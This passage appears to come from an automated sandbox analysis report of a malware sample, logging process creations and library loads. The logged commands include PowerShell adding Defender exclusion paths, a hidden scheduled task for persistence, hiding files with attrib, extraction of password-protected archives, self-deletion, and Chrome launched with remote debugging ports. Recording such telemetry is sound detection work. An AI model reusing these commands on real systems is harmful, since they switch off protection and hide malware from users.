                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextractedJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextractedJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextractedJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextractedJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextractedJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextractedJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextractedJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextractedJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\pnpyqs"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess created: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe "C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess created: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe "C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeProcess created: unknown unknown
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2276,i,12319100627993208386,7193125325130927108,262144 /prefetch:8
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\mode.comSection loaded: ulib.dllJump to behavior
                      Source: C:\Windows\System32\mode.comSection loaded: ureg.dllJump to behavior
                      Source: C:\Windows\System32\mode.comSection loaded: fsutilext.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                      Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                      Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                      Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                      Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
